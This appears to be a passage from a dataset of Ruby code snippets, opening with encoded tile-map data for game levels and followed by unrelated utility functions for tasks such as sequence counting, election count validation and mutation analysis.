14410055000100555000000011155555111000000000555055000_00000001100000001441155000114410050000000005000004000111111100040000005000055000_00000001100000000001100000110000000000110000000001011155555111010000005500005050_00000001111001111111100000111111110011110000000001110000000001110000000000055500_00500001101100051551100055115515000115110000000400011111111111000400000000005500_05500001100110051551100005115515001155110000000101114444444441110100000000000500_05505001111111011111100000111111011111110000000111000000000000011100000000000500_00555001100400000001100000110000000400110000000010040040004004001000000000005500_00500001100400000001100000110000000400115000000010010010001001000000000000055500_00500001104440000001100000110000004440115000000111111111011111111100000000555000_00500001100400000501100000110000000400115500001111111111011111111110000005555500_11111111100000005500000000000000000000111111111111111111011111111111111111111111_11111111111111111111111111111111111111111111111111111111011111111111111111111111_11111111111111111111111111111111111111111111111111111111011111111111111110000011_11111111111111111111111111111111111111111111111111111111011100110011001110030011_11111111111111111111111111111111111111111111111111111111000000000000000000111011_11111111111111111111111111111111111111111111111441144111011111111111111111111111_11111111111111111111111111111111111111111111111440044000011111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 30,\n ),\n Map.new(\n name: 'Moon Launcher',\n data: 'color_7070ae-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000050000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000005000000000050000000000000000000000050000000000000005000000000000_00000000000000000000000000000000000050000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000005000_00000000005000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000011100000000000000000000000000_00000000000000000000500000000000000000000000000000111110000000000000000000000000_00000000000000000000000000000000000000000000000001101111000050000000000000000000_00000000000000000000000000050000000000000000000001111011000000000000000000000000_00000000000000000000000000000000000000000000000001101111000000000000044440000000_00000000000000000000000000000000000000000004000000111110000000000000411114400000_00000000000000000000000000000000000000000004000000011100000000000000111111140000_05000000000000000000000000000000000000000004000000000000000000000000000111114000_00000000000000000000000000000050000000000000000000000000000000000000000011111000_00000000000000000000000000000000000000000004000000000050000000000000000011111400_00000000500000000000500000000000000000000000000000000000000000000000000001111100_00000000000000000000000000000000000000000000000000000000000000000000000001111100_00000000000000000000000000000000000000000004000000000000000000000000000001111100_00000000000000000000000000000000000000000000000000000000000000000000000001111100_00000000000000000000000000000000000000000000000000000000000000000000000011111000_00000000000000000000000000000000000000000000000000000000005000000000000011111000_00000000000005000000000000000000005000000004000000000000000000000000030111110000_00000005000000000000000000000000000000000000000000000000000000000000111111100000_00000000000000000000000000000000000000000000000000000000000000000000011110000000_00000000000000000000000000000000000000000010100000000000000000000000000000005000_00000000000000000000000000000000000000000114110000000000000000000000000000000000_00000000000000000000000000005000000000000110110000000000000000000000000000000000_00000000000000000000000000000000000000000110110050000000000000000000000000000000_00000000000000000000000000000000000000000110110000000000000000000000000000000000_00000000000000000000000000000000000000000114110000000000000500000000000000000000_00000000000000000000000000000000000000000110110000000000000000000000000000000000_00000500000000000000000000000000000000000010100000000000000000000000000000000000_00000000000000000000000050000000000000000114110000000000000000000000000000000000_00000000000000000000000000000000000000000010100000000000000000000000000000000000_00000000000000000000000000000000000000000110110000000000000000000000000000000000_00000000000000000000000000000000000000000014100000000000000000000000000000000000_00000000000000000000000000000000000000000110110000000000000000000000000000000000_00000000000000000000000000000000000000000010100000000000000000000000000000000000_00000000000000000000000000000000000000000014100004440000000000000000000000000000_00000000000000000000000000000000000000000010100000000000000000000000000000000000_00000000000500000000000000000005000000000010100000000000000500005000000005000000_00000000000000000000000000000000000000000014100000000000000000505000000000000000_00000000000000000000000000000000000000000010105500000051111111111111111111111101_05000000000000000000000000000000000000055014105500000051115101515101010101010001_00000000000000000000000000000000000000055010105500000051010000005000000000010111_00000000000000000000000000000000000000011014101100000000000000000000000101010001_00000000000000000000000000000000000000011010101100000000000000000000000111011101_00000000000000000000000000000000000444011004001100000000004400000000000001010001_00000000000000000000000000000000000444011111111101111111111100000000000001010111_00001001110101011010110101010001100111011111111100100001001100044000000001000001_00001001110101011110100111011001110111111110111100100411000000011000000001010111_00001101010111010110110101011101010010011510151101110001000011111111100001010001_00000000000000000000000000000000000010011510151101110411000011010000000001011101_11111111111111111111111111111111111111111510151100000001000000010000000001010001_00000000000000000000000000000000000000011511151100000411000000010000000001010111_00000000000000000044400000004440000000111111111110000001000500010000050001010001_00000000000000000000000000000000000000111110111110000411055550010005555551011101_02000000000000000000000000000000000000000000000000000001555555515555555511110001_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 32,\n ),\n Map.new(\n name: 'Garden of Giants',\n data: 'color_ecbfc4-00000000000000000000000000000000000000000000000000000000000000000000000444410000_00000000000000000000000000000000000000000000000000000000000000000000000044410000_00000000000000000000000000000000000000000000000000000000000000000000000004410000_00000000000000000000000000000000000000000000000000000000000000000000000000410000_00000000000000000000000000000000000000001000000000000000000000000000000000010000_00000000000000000000000000000000000000001000000000000000000000000000000000010000_00000000000000000000000000000000000000001000000000000000000000000000000000010000_00000000000000000000000000000001000000001000000000000000000000000000000000010000_00000000000000000000000000000001000000000000000000000000010000000000000000000000_00000000000000000000000000000001000000000000000000000000010000000000000000000000_00000000000000000000000000000001000000000000000000000000010000000000000000000000_00000000000000000000000000000001000000000000000000000000010000000000000000000000_00000000000000000000000000000000000000000000000000000000010000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000100000000000000000000000000000004400000000_00000000000000000000000000000000000000100000000000000000000000000000001100000000_00000000000000000000000000000000000000100000000000000000000000001000001101000000_00000000000000000000000000000000000000100000000000000000000000001000001111100000_00000000000000000000000000000000000000100000000000000000000000001000001110110000_00000000000000000000000000000000000000100000000000000000000555000000001100011000_00000000000000000000000000000000000000100000000000000000005505500000011001001100_00000000000000000000000000000000000000100000000000000000055000550000111011101110_00000000000000000000000000000000000000000000000000000000005050050000001011100000_00044440000000000000000000000000000000000001000000000000005550050000001011101000_00444400000000000000000000000000000000000001000000000000000000055000001000001000_00044000000000000040000000000000000000000000000000000000000000055000001000001001_00000000000000000000000000000000000000000000000000000014000000050000001110111001_10000000110000000000000000000000000000000000000000000014000000550000001110111011_10000001100000000000000000000000000000000000000000000014000000550000000010100011_10000011000000000000000000000000000000000000000000000014000055555000000010100011_10000110000440000000000000000000000000000000000000000014000555555000000010100011_11100000000444000000000000005000000000000000000000000014000550005500000010111111_10110000000000000000000000005500000000000000000000000014005550505500000010000001_10011000000000000000000000000500000000000000000000000014005550505500000010000001_10001100000000000000000000000500000000000000000005550014005550555000000011111101_10000000110000000000000000000501111444000000000050050014005550000000000011111101_10000001100000000000000000000500011111440000000050000014000550000000000001110101_10000011000000000000000000000550001011110000000005555014000505000000000000110101_10000110000000000000000000000050000010000000000000500514000555000000000000110001_11100000000000000000000000000055000010000000000005505514000055500005555000010001_10110000000000000000000000000005000000000000000005500010005055500055055555000001_10011000000000000000000000000005000000000000000000550010005005505550005555500001_10001100000000000000000000000005000000000000000000005010050005555500000005500001_10000000110000000000000000000005000000000000000000005515005055555000000005550001_10000001100000000000000000000055000000000000000000000515005555550000000000550001_10000011000000000000000000000050000000000000000000005015505550550000000300550001_10000110000000000000000000000050000000000000000000055015505000550000011100050001_11100000000000000000000000000050000000000000000500050555555000550000110000050001_10110000000000000000000000000055000000000000000500055055555500050001100000550001_10011000000000000000000000000055500000000000000500505555555550550000000005500001_10001100000000000000000000000005500000000000005500555055500505050000005555000001_00000000110000000000000000000000500000000000005000055055555005550000000555000001_00000001100000000000000000000055550000000000055500050555505055050111000000000001_20000011000000000050000000000055550000000050055000550555005555550001100000000001_11111110000005000050000000000055155000000555005500000555555055550000110000000001_10050050000055005550050000005005555005005515005055015555055555555500011000000001_10555055500050555050555005550515015505550501000555555555005005050500001100000001_10555555555050555555055055505555555115055100550510555555015505555505000110000001_15555555555555555555555555515555555555550505505055500155505550055055500011111111',\n skill_mean: 34,\n ),\n Map.new(\n name: 'Pyramid Dimension',\n data: 'color_c17c7a-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000555555555555555555555555555000000000000000000000000000_00000000000000000000000000055555555555555555555555550000000000000000000000000000_00000000000000000000000000005555555555555555555555500000000000000000000000000000_00000000000000000000000000000555555555555555555555000000000000000000000000000000_00000000000000000000000000000055555555555555555550000000000000000000000000000000_00000000000000000000000000000005555555555555555500000000000000000000000000000000_00000000000000000000000000000000555555555555555000000000000000000000000000000000_00000000000000000000000000000000055555555555550000000000000000000000000000000000_00000000000000000000000000000000005555555555500000000000000000000000000000000000_00000000000000000000000000000000000555555555000000000000000000000000000000000000_00000000000000000000000000000000000055555550000000000000000000000000000000000000_00000000000000000000000000000000000005555500000000000000000000000000000000000000_00000000000000000000000000000000000000555000000000000000000000000000000000000000_00000000000000000555555555555555000000050000055555555555555555550000000000000000_00000000000000000055555555555550000004444400005555555555555555500000000000000000_00000000000000000005555555555500000440050044000555555555555555000000000000000000_00000000000000000000555555555000004400050004400055555555555550000000000000000000_00000000000000000000055555550000004400050004400005555555555500000000000000000000_00000000000000000000005555500000001100050001100000555555555000000000000000000000_00000000000000000000000555000000000100010001000000055555550000000000000000000000_00000000000000000000000050000000000100010001000000005555500000000000000000000000_00000000000000000000000000000000000100010001000000000555000000000000000000000000_00000000000000000000000000000000000144414441000000000050000000000000000000000000_00000000000000000100000000000000000144414441000000000000000004000000000000000000_00000000000000001110000000000000000144414441000000000000000044400000000000000000_00000000000000011111000000000000000144414441000000000000000444440000000000000000_00000000000000111111100000000000000100414001000000000000004444444000000000000000_00000000000005555555550000000000000100414001000000000000011111111100000000000000_00000000000000555555500000000000000100414001000000000000001111111000000000000000_00000000000000055555000000000000000102414001000000000000000111110000000000000000_00000000000000005550000000500000000111111111000000004000000011100000000000000040_00000000000050000500000005550000000000010000000000044400000001000050000000000440_00000000000555000000000055555000000000111000000000444440000000000555000000004440_00000000005555500000000555555500000001111100000004444444000000005555500000044440_00000000055555550000001111111110000011111110000011111111100000055555550000111110_00000000555555555000000111111100000111111111000001111111000000555555555000011110_00000005555555555500000011111000001111111111100000111110000005555555555000001110_00000055555555555550000001110000011111111111110000011100000055555555555000000110_00000555555555555555000000100000111111111111111000001000000555555555555005000010_00005555555555555555500000000001111111111111111100000000005555555555555005500000_00055555555555555555550000000011111111111111111110000000055555555555555005550000_00555555555555555555555000000111111111111111111111000000555555555555555005555000_05555555555555555555555500001111111111111111111111100005555555555555555005555500_55555550555555555555555550011111111111111111111111110055555555555555555005555550_55555500055555555555555555111111111111111111111111111555555555555555555005555555_00000001000000005500000000000000000000000000000000000000000000000000000001000000_00000011100000005500000000000000000000000000000000000000000000000000000001100000_00000113110000005500111111111111100000000000001111111111111000000000000001110000_00110000000110005500011111111111000000000000000111111111110000000000000001111000_04144441444414005500011111111110000000015000000011111111100000001000000001111100_04144411144414005000010111111100000000115500000001111111000000011000000001111110_04144111114414005000010011111000000001115550000000111110000000111000000001111111_04141115111414000000010001110000000011115555000000011100000001111000000001111111_04111151511114000000010000100000000111115555500000001000000011111000000001111111_04111515151114000000010000000000001111115555550000000000000111111000000001111111_01111111111111000000010000000000011111115555555000000000001111111000000001111111_00555555555550000000010000000000000000000000000000000000000000000000000001111111_00055555555500000000010000000000000000000000000000000000000000000000000001111111_00005555555000000000000000000000000000000000000000000000000000000000000000000000',\n skill_mean: 38,\n ),\n Map.new(\n name: 'Diving with Whales',\n data: 'color_6c87d6-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000555500000000000000000000000000000000000000_00000000000000000000000000000000000055000550000000000000000000000000000000000000_00000000000000000000000000000000000050000550000000055555000000000000000000000000_00000000000000000000000000000000000050005500000000550005500000000000005555500000_00000000000000000000000000000555000055000000000000550000550000000000055555550000_00000000000000000100000000000500500005550000000000550000550000000000555505550000_00200000000000000110000000000000500000005555555000055000550000000055500000055000_00100000000000000111100000000000500000000000000000000000550000505550000000005000_00110000000000001144100000000000500055500000000000000005500000000000000500050000_00011000000000001140110000000005000550050004000055555555000000000000000055500000_00001100000005001400110000005550005500000041000000000000000000000000000000000000_05000110001105511010111055555550005500000411000000000000000000000000000000000000_05550110111115110100111055050500005500004111000000000000000000000000000000000000_00055511100411101100000055005500000550001111000000000000000000000000000000000000_00005511004011101000111055500500000555000001030000000000000000000000000055500005_50050110040111011000115555555550115555501111111000550001110000000000000555000555_05555100401110010000115555115555555555555111115555555511111111110000055055555555_55551104011110100051155555555555555555555555555505501111111111111100000000055055_00011040011101100551155055505550000000055555500050011111111111111111000000000000_55510400111411000511000000000000000000000000000500111111111111111111111000000000_50011001114010000111000500000000000000000000005501111111111000001111111100000000_55501100040000110110500000000000000000000000055011111111100000000001110000000000_00005110400001155100000000000000000000000000055011111111100000000001110000000000_05505110000011551100000000000050000000000000050111111111100000000000111000000000_00501100001115511055550005555005500000000000050111111111110000000000000000000000_55501000011000111550055500000000000005500000501111111101111000000000000000000005_50010000000000000000000000000000005555000000501111111000111000000000000000000555_00115000000001100000000000000055550000000005001111110000000000000000000000055550_01155555000011000000000005505500000000000000001111100000000000000000000000000000_11555555555110000000000000000000000000000000000110000000000000000011110000000000_11111555511100000000000000000000000000000000055500000000000000001111100000000000_00111111110000000000055555555500000000000055500000000000000000011111100000000000_00000000000000000000111111115555500055005550000000000000000011111111000000000000_00100000000000000011111111111155555500555000000000000000001111111111110000000000_01111000000000000111111111111111555555000000000000000001111111111111111000000000_00100000000000000111111111111111100000000000000000000111111111111011111100000000_00000000000000000011111111111111111000110000000001111111111111100000011110000000_00000000000000000001111111111111111111111100000111111111111110000000000000000000_00000000000000000000011111111111111111111111111111111111111000000000000000000000_00000000010000000000001111111111111111111111111111111111110000000000000000000000_01000000111100000000000111111111111111111111111111111111100000000000000000000000_00000000010000000000000011111111111111111111111111111111000000000000000000000000_00000000000000000111000011111111111111111111111111111110000000000000000000001000_00000000000000000011100001111111111111111111111111111100000000000000000000011110_00001100000000000000000000111111111111111111111111110000000000000000000000001000_00000000000000000000000000011111111111111111111111000000000000010000000000000000_00000000000000000000000000011111111111111111111100000000000000000000000000000000_00000000000010000000000000011111111111111111110000000000000000000000000000000000_00000000000111110000000000011110011110000000000000000000000000000000000000000000_00000000000010000000000000011100011110000000000000000000001000000000000000000000_00001000000000000000000000111100011100000000000000000000000000000000000000000000_00011110000000000000000000111100011100000000000000000000000000000001000000000000_00001000000000000000000000111000011110000000000000001000000001000000000000000000_00000000001110000000000000011000001110000000000000011110000000000000000000000000_00000000001000000000000000000000000110000000000000001000000000000000000010000000_00000000000000000000000000000000000000000000000000000000001000000000000111100000_00000001000000000000000000000000000000000000000000000000011110000000000010000000_01000000000000000000000111000000000000011000000000000000001000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000',\n skill_mean: 40,\n ),\n Map.new(\n name: 'The Astral Ascent',\n data: 'color_ff6666-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000050000000000000000000000000005000000000000000000000000000000_00000000000000000000000000000000004000000000000000000000000000000000000000000000_00000005000000000000000000000000000004000000000000000000000000000000000500000000_00000000000000000000000000000040000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000005000000000000000000000_00050000000000000000000000004000000000000000000500000000000000000000000000000000_00000000000000000040000000000000000000000000000000000000000000000000000000000000_00000000000000000400000000000000000000040000000000000000000000000000050000000000_00000000000000000000000000111100000000040000000000000505000055000000000000000000_00000000050000000000000005511500000000040000000000005555555500000000000000000000_00000000000000000000005555555505000000040000000500055550555555555000000000000000_00000000000000000000055500005055000000000000000505055550000005055500000000050000_00000000000000030000550000000005555000000000555555555500000000005550000000000000_00005000000001111155050000000400055501101100055550000000000000000050000000000000_00000000000001000155000000000000005550101000555500000000000000000050000000000000_00000000000001020150000000000000000550101005555050000000000000000050000000000000_00000000000041000150000000000000000555101005555000000005000000000000000000000000_00000000000011141110000000041114000051101105550000000000000000000000000000000000_00000000000001000100000000000100000555101555550000000000000000000000000000500000_00000005000001141100000000000100000055101555550000000000000000000000000000000000_00000000000001000100000000000100000005101555555500000000000050000000000000000000_00000000000001141100000000004100000055101555550000000000000000000000000000000000_00500000000041000100040000040100000005101555000000000500000000000005000000000000_00000000000011141110110000011111400001101100000000000000000000000000000000000000_00000000000001000000155555511111400555101555550000000000000000000000000000000000_00000000000001111111155555511111400055101555550500000000000000000000000000000000_00000000000005555500040044004400005555101555555050000000050000000000000000000000_00000500000005555500000000000000005555101555555505000000000000000000000000000000_00000000000005555500550055005500555555101555555055550000000000000000000000000000_00000000000005555500551155115511555555101555555555555500000000000000500000000000_00000000005005555500551155115511555555101555555555555550000000000000000000000000_00000000000005555500000044004400000400101555555505555500000000000000000000005000_00000000000005555500000000000000000000101555555505505050000000000000000000000000_00050000000005555511004055005500555000101555555550500055500500005550000000000000_00000000000005555511001155115511555000001555555555505505555055555005550000000000_00000000000005555500001155115511555111111555505500555055050000000000005000000000_00000000000005055500000005555555555555555555555505555555505000000000000000000000_00000000500000050500000005555555055555555555500555505505500000000000000000000000_00000000000000000500000000055555500005555505000000055505055505500000000000000000_00000000000000000500000000000500055500050000000000005055000555000000500000000000_00005000000000000000000000000000000000000000000000000055000000500000000000000000_00000000000000000000005000000000000000000000000000000050000000055500000000000000_00000000000000000000000000000000000000000000000000055500000000000550000000000000_00000000000000500000000000000000000000000000500000055500000000000050000000000000_00000000000000000000000005000000000000000000000000555000000000000055000000050000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000005000000000000000000000000000000000000000000_00000005000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000500000000000000000000_00000000000000000050000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000500000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000500000000000000000500000000_00005000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000050000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_55555555555555555555555555555555555555555555555555555555555555555555555555555555',\n skill_mean: 44,\n ),\n Map.new(\n name: 'Mothership Warp',\n data: 'color_339999-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000500000000000000_00000000000000000000000000000000000000000000000000000000000000000550000000000000_00000000000000000000000000000000000000000000000000000000000000000555000000000000_00000000000000000000000000000000000000000000000000000000000000000555000000000000_00000000000000000000000000000000000000000000000000000000000000000555000000000000_00000000000000000000000000000000000000000000000000000000000000000555000000000000_00000000000000000000000000000000000000000000000000000000000000000555000000000000_00000000000000000000000000000000000000000000000000000000000000000555000000000000_00000000000000000000000500000000000000000000000000000000000000000555000000000000_00000000000000000000000550000000000000000000000000000000000000000055000000000000_00000000000000000000000555000000000000000000000000000000000000000005000000000000_00000000000000000000000555000000000000000000000000000000000000000005000000000000_00000000000000000000000555000000000000000005000000000000000000000005000000000000_00050000000000000000000555000000000000000055000000000000000000000005000000000000_00055000000000000000000555000000000000000555000000000000000000000005000000000000_00055500000000000000000555000000000000000555000000000000000000000005000000000000_00055500000000000000000055000000000000000555000000000000000000000005000000000000_00055500000000000000000005000000000000000555000000000000000000000005000000000000_00055500000000000000000005000000000000000555000000000000000000000005000000000000_00055500000000000000000005000000000000000555000000000000000000000000000000000000_00055500000000000000000005000000000000000550000000000000000000000000000000000000_00005500000000000000000005000000000000000500000000000000050000000000000000000000_00000500000000000000000005000000000000000500000000000000550000000000000000000000_00000500000000000050000005000000005000000500000000000005550000000000000000000000_00000500000000000050000005500000055000000500000000000005550000000000000000000000_00000500000000000050000005550000555000000500000000000005550000000000000000000000_00000500000000000050000005555005555000000500000000000005550000000000000000000000_00000500000000000010000055555005555500000500000000000005550000000000000000000000_00000500000000000010000055555005555500000100000000000005550000000000000000000000_00000500000000000010300055555005555500020100000000000005550000000000000000000000_00000000000000000011110055555005555500111100000000000005550000000000000000000000_00000000000000000015500055555005555500055100000000000005500000000000000000000000_00000000000000000015500055555005555500055100000000000005000000000000000000000000_00000000000000000015500055555005555500055100000000000005000000000000000000000000_00000000000000000015500055555005555500055100000000000005000000000000000000000000_00000000001111111115555555555005555555555100000000000005000000000000000000000000_00000000001555555555555555555005555555555100000000000005000000000000000000000000_00000000001000000000000055555005555500000100000000000005000000000000000000000000_00000000001000000000000005555005555000000100000000000005000000000000000000000000_00000000001000000000000000555005550000000100000000000005000000000000000000000000_00000000001004400000044000055005500000000100000000000005000000000000000000000000_00000000001001100000011000005005000000000100000000000005000000000000000000000000_00000000001001555555551000005000000000000100000000000005000000000000000000000000_00000000001000500000050000005000000000000100000000000000000000000000000000000000_00000000001000500000050000005000000000000100000000000000000000000000000000000000_00000000001000500000050000005000000000000100000000000000000000000000000000000000_00000000001000500000050000005000000000000100000000000000000000000000000000000000_00000000005000500050000000005000000000000100000000000000000000000000000000000000_00000000005000500050000000015000000000000100000000000000000000000000000000000000_00000000005000500050000000015000000000000100000000000000000000000000000000000000_00000000000000500050000001115000000000000100000000000000000000000000000000000000_00000000000000500055555555555555555500055100000000000000000000000000000000000000_00000000000000500000000000000000000000000100000000000000000000000000000000000000_00000000100000510000000000000000000000000100000000000000000000000000000000000000_00000000100000510044400000000000000000000100000000000000000000000000000000000000_00001111100000511111111000000000000000000100000000000000000000000000000000000000_00001000000000555555551000000000000000000100000000000000000000000000000000000000_00001000000000000000551000000000000000000100000000000000000000000000000000000000_00001000000000000000551000000000000000000100000000000000000000000000000000000000',\n skill_mean: 47,\n )\n ]\nend",
"def uniq_sequence(seq = {}, sequence_name = \"sequence\")\n uni = count(seq.values)\n new_seq = {}\n n = 1\n uni.each do |s,c|\n name = \">\" + sequence_name + \"_\" + n.to_s + \"_\" + c.to_s\n new_seq[name] = s\n n += 1\n end\n return new_seq\nend",
"def compute_index \n self.rewind\n r = %r{\\<scan\\snum\\=\\\"(\\d+)\\\"|\\<spectrum\\sid\\=\\\"(\\d+)\\\"}\n index = {}\n while (!self.eof) \n pos = self.pos\n if (r.match(self.readline)) then \n m = $1 ? $1 : $2\n index[m.to_i] = pos\n end\n end\n index\n end",
"def validate_expected_counts(expected_counts)\n exp_cids = []\n exp_rgs = []\n exp_pids = []\n expected_counts.each do |ecount|\n cid = ecount[\"counter_ident\"].to_s\n exp_cids.push(cid) unless exp_cids.include?(cid)\n rg = ecount[\"reporting_group\"].to_s\n exp_rgs.push(rg) unless exp_rgs.include?(rg)\n val_err(\"Non-Existent Counter UID\", cid, \"in Expected Count\") unless\n uid_exists?(\"counter\", cid)\n val_err(\"Non-Existent Reporting Group\", rg, \"for Counter UID\", cid, \"in Expected Count\") unless\n uid_exists?(\"reporting group\",rg)\n ecount[\"precinct_ident_list\"].each do |pid|\n pid = pid.to_s\n exp_pids.push(pid) unless exp_pids.include?(pid)\n val_err(\"Non-Existent Precinct UID\", pid, \"for Counter UID\", cid, \"in Expected Count\") unless\n uid_exists?(\"precinct\", pid)\n if (self.counts_expected.include?([cid, rg, pid]))\n val_warn(\"Duplicate Expected Count\", \"#{cid}, #{rg}, #{pid}\", \"in Election Definition\")\n else\n self.counts_expected.push([cid, rg, pid])\n end\n end\n end\n diff_cids = (self.uids[\"counter\"] - exp_cids)\n val_warn(\"Missing Counter UIDs\", diff_cids, \"from Expected Counts\") unless\n (diff_cids.length == 0)\n diff_rgs = (self.uids[\"reporting group\"] - exp_rgs)\n val_warn(\"Missing Reporting Groups\", diff_rgs, \"from Expected Counts\") unless\n (diff_rgs.length == 0)\n diff_pids = (self.uids[\"precinct\"] - exp_pids)\n val_warn(\"Missing Precinct UIDs\", diff_pids, \"from Expected Counts\") unless\n (diff_pids.length == 0)\n end",
"def experimental_media_hash_matrix(inducer_mat, experimental_antibiotic_mat)\n media_hash = Hash.new(0)\n experimental_media_matrix = [] # Combines antibiotic and inducer media strings to create a matrix that combines both medias\n inducer_mat.each_with_index do |row, r_idx|\n mat_row = []\n row.each_with_index do |col, c_idx|\n if col != \"-1\"\n media = experimental_antibiotic_mat[r_idx][c_idx] + \"_\" + col\n mat_row.push(media)\n if !media_hash.include? media\n media_hash[media] = 1\n else\n media_hash[media] += 1\n end\n end\n end\n experimental_media_matrix.push(mat_row)\n end\n return media_hash, experimental_media_matrix \n end",
"def isogram_matcher(isogram1, isogram2)\n \n # get common, get match in same position\n # position\n positions = 0\n i = 0\n while i < isogram1.length\n if isogram1[i] == isogram2[i]\n positions += 1\n end\n i += 1\n end\n \n # common\n common = (isogram1.split(\"\") & isogram2.split(\"\")).length\n common = common - positions\n \n [positions, common]\n \nend",
"def remove_errant_matches_from(pot_ex_array)\n correct_match_arr = []\n pot_ex_array.each do |example|\n constituents = example.construct_constituents_array\n constituents.each do |const_array|\n if const_array[0] == self.word && const_array[1] == self.hiragana && const_array[3] == self.reading # For this to work, the constituents have to be normalized to dictionary_forms.\n correct_match_arr << example\n end\n end\n end\n return correct_match_arr\n end",
"def check_correspondence(header)\n\t\terr = \"\"\n\t\tif(header.length > @map.length)\n\t\t\traise \"inconsistent between header and mapping\"\n\t\tend\n\t\t\n\t\tidx = 0\n\t\t@map.each_key do |key|\n\t\t\tif(idx == header.length-1) \n\t\t\t\tbreak\n\t\t\telsif(header[idx].eql?(key))\n\t\t\t\tidx+=1\n\t\t\tend\n\t\tend\n\t\tif(idx < header.length - 1)\n\t\t\traise \"inconsistent between header and mapping_\"\n\t\tend\n\t\t\n\t#\tputs header\n\t#\tputs @map\n\t#\tputs \"IDX=\"+idx.to_s\t\n\tend",
"def remove_invalid_references\n addresses = self.addresses.to_set\n missing = Set.new\n result = map do |r|\n common = (addresses & r['references'])\n if common.size != r['references'].size\n missing.merge(r['references'] - common)\n end\n r = r.dup\n r['references'] = common\n r\n end\n return result, missing\n end",
"def validate_no_repeating_measure_population_ids(data = {})\n no_duplicate_measures = true\n doc_population_ids = @doc.xpath(measure_population_selector).map(&:value).map(&:upcase).sort\n duplicates = doc_population_ids.group_by { |e| e }.select { |_k, v| v.size > 1 }.map(&:first)\n duplicates.each do |duplicate|\n begin\n measure_id = @doc.xpath(find_measure_node_for_population(duplicate)).at_xpath(\"cda:reference/cda:externalDocument/cda:id[./@root='2.16.840.1.113883.4.738']/@extension\")\n @errors << build_error(\"Population #{duplicate} for Measure #{measure_id.value} reported more than once\", '/', data[:file_name])\n rescue\n @errors << build_error(\"Population #{duplicate} for reported more than once\", '/', data[:file_name])\n end\n no_duplicate_measures = false\n end\n no_duplicate_measures\n end",
"def sdrm_in_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"IN\"\n rf_label = 2\n start_codon_number = 53\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = sdrm_int(aa_seq, start_codon_number)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def each_match(hash)\n line[:type, :all].count.times do |i|\n next unless hash.all? { |k, v| line[k, :all][i] == v }\n yield(\n :type => line[:type, :all][i],\n :ssn => line[:ssn, :all][i],\n :ein => line[:ein, :all][i],\n :amount => line[:amount, :all][i]\n )\n end\n end",
